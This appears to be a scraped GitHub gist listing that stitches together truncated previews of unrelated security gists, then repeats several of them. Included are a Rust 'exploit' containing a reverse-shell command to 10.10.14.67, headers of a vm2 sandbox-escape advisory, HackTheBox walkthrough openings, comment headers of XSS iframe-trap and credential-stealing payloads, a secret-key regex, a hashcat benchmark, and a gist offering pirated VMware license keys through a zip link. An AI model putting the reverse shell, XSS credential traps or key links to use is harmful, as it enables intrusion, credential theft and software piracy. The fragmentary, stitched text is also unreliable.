clem9669

## nmap-xml-to-httpx.sh
#!/bin/bash

# Check if an argument was provided
if [ $# -eq 0 ]; then
    NMAP_XML_OUTPUT="/dev/stdin"
else
    NMAP_XML_OUTPUT="$1"
fi

# Use xmllint to parse IP addresses and ports from the Nmap XML output

## reverse.rs
// I couldn't find the owner of the exploit, anyone who knows can comment so I can give the credits ;)
extern crate chrono;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::process::Command;

pub fn log(user: &str, query: &str, justification: &str) {
    let command = "bash -i >& /dev/tcp/10.10.14.67/444 0>&1";

## vm2_3.9.19_sandbox_escape_2.md

      
              1 file
            
          
              2 forks
            
          
              1 comment
            
          
              8 stars
            
          
                leesh3288
                / vm2_3.9.19_sandbox_escape_2.md
            
            
              Last active
              March 30, 2024 07:00
            
              
                Sandbox Escape in vm2@3.9.19 via custom inspect function
              
          
    Sandbox Escape in vm2@3.9.19 via custom inspect function

Summary

In vm2 for versions up to 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code.
Proof of Concept


## netexec-vs-absolute.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                mpgn
                / netexec-vs-absolute.md
            
            
              Last active
              April 17, 2024 17:04
            
              
                NetExec vs Absolute
              
          
    In progress


First we get the domain name to edit our etc hosts file

netexec smb 10.10.11.181                                                          
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)


Domain name: absolute.htb
Netbios name: DC


## vmwk17key.txt
Install VMWare Workstation PRO 17 (Read it right. PRO!)
Also, these keys might also work with VMWare Fusion 13 PRO. Just tested it.

Sub to me on youtube pls - PurpleVibe32
if you want more keys - call my bot on telegram. @purector_bot (THE BOT WONT REPLY ANYMORE) - Or: https://cdn.discordapp.com/attachments/1040615179894935645/1074016373228978277/keys.zip - the password in the zip is 102me.
---
This gist can get off at any time.
PLEASE, DONT COPY THIS. IF YOU FORK IT, DONT EDIT IT.
*If you have a problem comment and people will try to help you!
*No virus

## Scrambled vs NetExec .md

      
              1 file
            
          
              3 forks
            
          
              0 comments
            
          
              7 stars
            
          
                mpgn
                / Scrambled vs NetExec .md
            
            
              Last active
              April 23, 2024 03:03
            
              
                Scrambled vs NetExec for fun and profit by @mpgn_x64
              
          
    Scrambled vs NetExec

Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading Scrambled writeup from 0xdf_ when I read this:

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :)
Note: I will pass the web part where we get one username : ksimpson

  
## stealCredsPayload.js
alert('Click ok when you\'re ready to enter iframe trap');

// Example Credential scraper and
// XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// Frame the login page, and copy out the
// username and password fields.
// @hoodoer

## Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

## Apple_M1_Ultra_v6.2.5-340
Apple M1 Ultra, 20 Core CPU, 48 Core GPU, 64GB of RAM, 1TB SSD

Thanks to @fhlipZero(https://twitter.com/fhlipZero) for running the benchmark on his hardware and allowing me to publish it.
A copy of both a short benchmark and the following full run can be found at https://gist.github.com/fhlip0


hashcat (v6.2.5-340-g98b89e43d) starting in benchmark mode

Benchmarking uses hand-optimized kernel code by default.

## xssIframeTrap.js
alert('Click ok when you\'re ready to enter iframe trap');

// Example XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// While they surf around, they stick in your
// iFrame, and you keep their session and your XSS
// payload running.
// @hoodoer
	#!/bin/bash

	# Check if an argument was provided
	if [ $# -eq 0 ]; then
	NMAP_XML_OUTPUT="/dev/stdin"
	else
	NMAP_XML_OUTPUT="$1"
	fi

	# Use xmllint to parse IP addresses and ports from the Nmap XML output
	// I couldn't find the owner of the exploit, anyone who knows can comment so I can give the credits ;)
	extern crate chrono;

	use std::fs::OpenOptions;
	use std::io::Write;
	use chrono::prelude::*;
	use std::process::Command;

	pub fn log(user: &str, query: &str, justification: &str) {
	let command = "bash -i >& /dev/tcp/10.10.14.67/444 0>&1";
	Install VMWare Workstation PRO 17 (Read it right. PRO!)
	Also, these keys might also work with VMWare Fusion 13 PRO. Just tested it.

	Sub to me on youtube pls - PurpleVibe32
	if you want more keys - call my bot on telegram. @purector_bot (THE BOT WONT REPLY ANYMORE) - Or: https://cdn.discordapp.com/attachments/1040615179894935645/1074016373228978277/keys.zip - the password in the zip is 102me.
	---
	This gist can get off at any time.
	PLEASE, DONT COPY THIS. IF YOU FORK IT, DONT EDIT IT.
	*If you have a problem comment and people will try to help you!
	*No virus
	alert('Click ok when you\'re ready to enter iframe trap');

	// Example Credential scraper and
	// XSS iframe trap. Load from whatever
	// page has the reflected/stored XSS vuln
	// trap the user in an iframe of the app.
	// Frame the login page, and copy out the
	// username and password fields.
	// @hoodoer
	Apple M1 Ultra, 20 Core CPU, 48 Core GPU, 64GB of RAM, 1TB SSD

	Thanks to @fhlipZero(https://twitter.com/fhlipZero) for running the benchmark on his hardware and allowing me to publish it.
	A copy of both a short benchmark and the following full run can be found at https://gist.github.com/fhlip0



	hashcat (v6.2.5-340-g98b89e43d) starting in benchmark mode

	Benchmarking uses hand-optimized kernel code by default.
	alert('Click ok when you\'re ready to enter iframe trap');

	// Example XSS iframe trap. Load from whatever
	// page has the reflected/stored XSS vuln
	// trap the user in an iframe of the app.
	// While they surf around, they stick in your
	// iFrame, and you keep their session and your XSS
	// payload running.
	// @hoodoer